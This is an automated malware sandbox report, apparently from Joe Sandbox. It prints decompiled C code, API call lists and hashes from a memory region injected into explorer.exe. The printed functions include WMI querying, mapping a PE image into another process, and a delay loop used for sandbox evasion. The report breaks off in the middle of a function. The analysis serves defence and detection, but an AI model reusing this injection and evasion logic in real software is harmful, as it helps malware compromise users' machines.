SystemDrive, xrefs: 0008D395, 0008D3A0, 0008D3B5

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: 494c9c268d65473a88fad62a96bc67cc968d94c268069d4b07f0f11ea41f2c73
Instruction ID: 9ed2d69f337547a45f1d04cc2ab2b4c9a19ce2c92f2bac6279536e5c09292047
Opcode Fuzzy Hash: 494c9c268d65473a88fad62a96bc67cc968d94c268069d4b07f0f11ea41f2c73
Instruction Fuzzy Hash: 9DB16D71600704AFE710EB74DD89FEA77E8FF58300F00452AF59AD7292EB74AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 0008DB7E, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0008DB7E(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D565(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E000885E5(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E000885FB( &_v60, 0xfffffffe);
					E0008D619( &_v104);
					return _t320;
				}
				_t165 = E000895C2(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895C2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892C6(_t165);
				_v60 = _t322;
				E000885B6( &_v52);
				E000885B6( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895C2(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885B6( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E000885FB( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891C4(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891C4(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088679(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000885E5( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E000885FB(_t136, 0);
								E000885FB( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891C4(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895C2(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895C2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000885E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885B6( &_v92);
											E000885B6( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089621();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000885E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895C2(_t283, 0x219);
										E00089621( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885B6( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891C4(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA62( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E000885FB( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x0008db87
0x0008db8d
0x0008db94
0x0008db97
0x0008db9a
0x0008db9f
0x0008dba1
0x0008dba6
0x0008dfee
0x0008dfee
0x0008dbb3
0x0008dbb5
0x0008dbb8
0x0008dbbb
0x0008dfd3
0x0008dfd9
0x0008dfe3
0x00000000
0x0008dfe8
0x0008dbc6
0x0008dbcd
0x0008dbd4
0x0008dbd7
0x0008dbdc
0x0008dbde
0x0008dbe1
0x0008dbe4
0x0008dbe5
0x0008dbee
0x0008dbf4
0x0008dbf7
0x0008dc00
0x0008dc05
0x0008dc0a
0x0008dc21
0x0008dc2e
0x0008dc31
0x0008dc38
0x0008dc3d
0x0008dc44
0x0008dc49
0x0008dc50
0x0008dc52
0x0008dc5e
0x0008dc61
0x0008dc63
0x0008dfc3
0x0008dfc4
0x0008dfcd
0x00000000
0x0008dfcd
0x0008dc69
0x0008dc6c
0x0008dc6f
0x0008dc72
0x0008dc74
0x0008df8f
0x0008df92
0x0008df95
0x0008df97
0x0008dfb9
0x0008dfbe
0x0008df99
0x0008df9c
0x0008dfa7
0x0008dfae
0x0008dfae
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dc7a
0x0008dc7a
0x0008dc8c
0x0008dc8f
0x0008dc91
0x00000000
0x00000000
0x0008dc99
0x0008dc9c
0x0008dc9f
0x0008dca2
0x0008dca5
0x0008dca8
0x00000000
0x00000000
0x0008dcae
0x0008dcbc
0x0008dcbf
0x0008dcc1
0x0008dcda
0x0008dce9
0x0008dcf1
0x0008dcf1
0x0008dcf4
0x0008dcfb
0x0008dcff
0x0008dd05
0x0008dd07
0x0008df77
0x0008df7d
0x0008df83
0x0008df86
0x0008df86
0x00000000
0x0008df86
0x0008dd16
0x0008dd2a
0x0008dd2e
0x0008dd30
0x0008dd35
0x0008df44
0x0008df4a
0x0008df55
0x0008df60
0x0008df66
0x0008df6c
0x0008df6f
0x00000000
0x0008df6f
0x0008dd3b
0x0008df12
0x0008df12
0x0008df15
0x0008df18
0x00000000
0x00000000
0x0008dd43
0x0008dd4b
0x0008dd52
0x0008dd58
0x0008dd5a
0x00000000
0x00000000
0x0008dd63
0x0008dd78
0x0008dd7e
0x0008dd87
0x0008dd8a
0x0008dd8d
0x0008dd8f
0x0008df05
0x0008df08
0x0008df11
0x0008df11
0x00000000
0x0008df11
0x0008dd9f
0x0008dda2
0x0008dda9
0x0008ddaf
0x0008ddb2
0x0008ddb5
0x0008ddb8
0x0008ddbb
0x0008ddf7
0x0008ddf7
0x0008ddfa
0x0008dea6
0x0008deba
0x0008deca
0x0008dece
0x0008ded0
0x0008dee7
0x0008deeb
0x0008def4
0x0008deff
0x00000000
0x0008deff
0x0008ded6
0x0008ded7
0x0008dedc
0x0008dedc
0x0008dede
0x0008dedf
0x0008dee4
0x00000000
0x0008dee4
0x0008de00
0x0008de00
0x0008de03
0x0008de6e
0x0008de82
0x0008de92
0x0008de96
0x0008de98
0x00000000
0x00000000
0x0008de9e
0x0008de9f
0x00000000
0x0008de9f
0x0008de05
0x0008de05
0x0008de08
0x00000000
0x00000000
0x0008de0a
0x0008de0d
0x00000000
0x00000000
0x0008de0f
0x0008de0f
0x0008de15
0x0008de31
0x0008de40
0x0008de49
0x0008de4e
0x0008de51
0x0008de57
0x0008de57
0x0008de5c
0x0008de68
0x00000000
0x0008de68
0x0008de1a
0x00000000
0x0008de1a
0x0008ddbd
0x0008dde4
0x0008dde9
0x0008ddee
0x0008ddf0
0x0008ddf0
0x00000000
0x0008ddee
0x0008ddbf
0x0008ddbf
0x0008ddc2
0x00000000
0x00000000
0x0008ddc8
0x0008ddc8
0x0008ddcb
0x00000000
0x00000000
0x0008ddd1
0x0008ddd1
0x0008ddd4
0x00000000
0x00000000
0x0008ddda
0x0008dddd
0x00000000
0x00000000
0x0008dddf
0x00000000
0x0008dddf
0x0008df21
0x0008df27
0x0008df2d
0x0008df30
0x0008df33
0x0008df33
0x0008df36
0x0008df37
0x0008df3a
0x0008df3c
0x00000000
0x00000000
0x0008df8c
0x0008df8c
0x00000000
0x0008df8c
0x0008dcc3
0x0008dcc9
0x00000000
0x0008dcc9
0x0008df89
0x00000000
0x0008dc0c
0x0008dc11
0x0008dc16
0x00000000
0x0008dc1a

APIs

Part of subcall function 0008D565: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D578
Part of subcall function 0008D565: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D589
Part of subcall function 0008D565: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D5A0
Part of subcall function 0008D565: SysAllocString.OLEAUT32(00000000), ref: 0008D5AB
Part of subcall function 0008D565: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D5D6

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

SysAllocString.OLEAUT32(00000000), ref: 0008DC27
SysAllocString.OLEAUT32(00000000), ref: 0008DC3B
SysFreeString.OLEAUT32(?), ref: 0008DFC4
SysFreeString.OLEAUT32(?), ref: 0008DFCD

Part of subcall function 000885FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088641

Strings

TRUE, xrefs: 0008DDE9
FALSE, xrefs: 0008DDF0

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: f1c0bed866cf98ae4ade4445067486658c4f56093c4ed91ebf1d3a39f71ad4df
Instruction ID: 73554170289a174f736e1aca8fc0718fcd4550517a85dfeebd17367b6f220d82
Opcode Fuzzy Hash: f1c0bed866cf98ae4ade4445067486658c4f56093c4ed91ebf1d3a39f71ad4df
Instruction Fuzzy Hash: C0E14F71900619AFDF14FFE4D885EEEBBB9FF48300F14856AE546AB291DB30A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0008C702, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008C702(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E280(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E0008864A( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0x14df8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0x14df8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E000885FB( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886C2(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C681(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}

0x0008c708
0x0008c70f
0x0008c711
0x0008c713
0x0008c715
0x0008c718
0x0008c71b
0x0008c71e
0x0008c721
0x0008c724
0x0008c727
0x0008c731
0x0008c734
0x0008c73b
0x0008c740
0x0008c740
0x0008c746
0x0008c748
0x0008c751
0x0008c8f7
0x0008c8fb
0x0008c900
0x0008c906
0x0008c909
0x0008c909
0x0008c90d
0x0008c912
0x0008c917
0x0008c924
0x0008c924
0x0008c92d
0x0008c92f
0x0008c937
0x0008c937
0x0008c93e
0x0008c93e
0x0008c75a
0x0008c75b
0x0008c760
0x0008c766
0x0008c768
0x0008c769
0x0008c76a
0x0008c76f
0x0008c770
0x0008c77a
0x00000000
0x00000000
0x0008c785
0x0008c78f
0x0008c799
0x0008c79c
0x0008c7a2
0x0008c7a9
0x0008c7aa
0x0008c7ab
0x0008c7b4
0x0008c7b5
0x0008c7b6
0x0008c7b8
0x0008c7bb
0x0008c7be
0x0008c7c1
0x0008c7c4
0x0008c7d0
0x0008c7f2
0x0008c7fa
0x0008c7fd
0x0008c808
0x0008c808
0x0008c7fa
0x0008c80e
0x0008c817
0x0008c819
0x0008c81a
0x0008c81c
0x0008c81d
0x0008c81e
0x0008c81f
0x0008c823
0x0008c82a
0x0008c82b
0x0008c833
0x0008c8f4
0x00000000
0x0008c839
0x0008c839
0x0008c83b
0x0008c83c
0x0008c841
0x0008c842
0x0008c843
0x0008c844
0x0008c845
0x0008c84b
0x0008c84c
0x0008c851
0x0008c852
0x0008c85a
0x00000000
0x00000000
0x0008c870
0x0008c872
0x0008c879
0x00000000
0x00000000
0x0008c88a
0x0008c890
0x0008c898
0x0008c89b
0x0008c8a1
0x0008c8b1
0x0008c8bd
0x0008c8c2
0x0008c8c8
0x0008c8d8
0x0008c8e4
0x0008c8ec
0x00000000
0x0008c8ec

APIs

RegisterClassExA.USER32 ref: 0008C7C7
CreateWindowExA.USER32 ref: 0008C7F2
DestroyWindow.USER32 ref: 0008C7FD
UnregisterClassA.USER32(?,00000000), ref: 0008C808
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C824
GetCurrentProcess.KERNEL32(00000000), ref: 0008C91D

Part of subcall function 000885FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088641

Strings

0, xrefs: 0008C78F
sadccdcdsasa, xrefs: 0008C780
cdcdwqwqwq, xrefs: 0008C7AC

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 07db7007716d2e4f817ceec71e527cc64f22d6031091f4fd9147fc7c0957f93d
Instruction ID: 56d27fbf482c3d975646c0c6fc4e7967b2fa72fb0b7d7cfbf44002fbb03df675
Opcode Fuzzy Hash: 07db7007716d2e4f817ceec71e527cc64f22d6031091f4fd9147fc7c0957f93d
Instruction Fuzzy Hash: C3714A71900248EFEB10DF95DD49EEEBBB9FB89700F10406AF645B7290DB74AA04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00085F63, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885D0();
				_t19 = E000897ED( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F59();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895A8(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885A3( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A93( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1FE(0x9ba20, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895C2(0x9ba20);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885B6();
							_v8 = 0;
							_t37 =  *0x9e684; // 0x14df8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085DE7, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885B6();
					}
					goto L10;
				}
			}

0x00085f63
0x00085f73
0x00085f7d
0x000860b1
0x000860a4
0x00000000
0x000860a6
0x000860b8
0x00086079
0x00000000
0x00086079
0x00085f83
0x00085f8b
0x00085f92
0x00085f94
0x00000000
0x00085fa7
0x00085fa7
0x00085fad
0x00085fb3
0x00085fc3
0x00085fc8
0x00085fd0
0x00085fd8
0x00085ff4
0x00085ff9
0x00085ffc
0x00085ffe
0x00086000
0x0008600d
0x00086016
0x0008601f
0x00086024
0x00086025
0x00086033
0x0008603d
0x0008604e
0x00086053
0x0008605a
0x00086061
0x00086064
0x00086070
0x00086071
0x0008607d
0x00086086
0x0008608a
0x00086098
0x0008609b
0x000860a2
0x00000000
0x00000000
0x00000000
0x000860a2
0x00086073
0x00086078
0x00000000
0x00085fd8

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F73
SetLastError.KERNEL32(000000AA), ref: 000860B8

Part of subcall function 000885D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085F88), ref: 000885D9

Part of subcall function 000897ED: GetSystemTimeAsFileTime.KERNEL32(?,?,00085F90), ref: 000897FA
Part of subcall function 000897ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0008981A

GetModuleHandleA.KERNEL32(00000000), ref: 00085FAD
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FC8
GetLastError.KERNEL32 ref: 00085FD0
memset.MSVCRT ref: 00085FF4
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086016
GetFileAttributesW.KERNEL32(00000000), ref: 00086064

Strings

Hello qqq, xrefs: 00085F6E

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 1203100507-3610097158
Opcode ID: 4f31329ab549de73e553f71aec2453dc4e4c4d5e3845196cd072b522dfaed058
Instruction ID: 7f496047aef766fd1361de2284b698e1d9fe11216d7a696fcc86108a41c7cf89
Opcode Fuzzy Hash: 4f31329ab549de73e553f71aec2453dc4e4c4d5e3845196cd072b522dfaed058
Instruction Fuzzy Hash: A431A371900214ABEB64BB60EC49EAE37B8FF81761F10812AF595D6292DF399944CF21

Uniqueness

Uniqueness Score: -1.00%

Function 0008E6AA, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0008E6AA(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
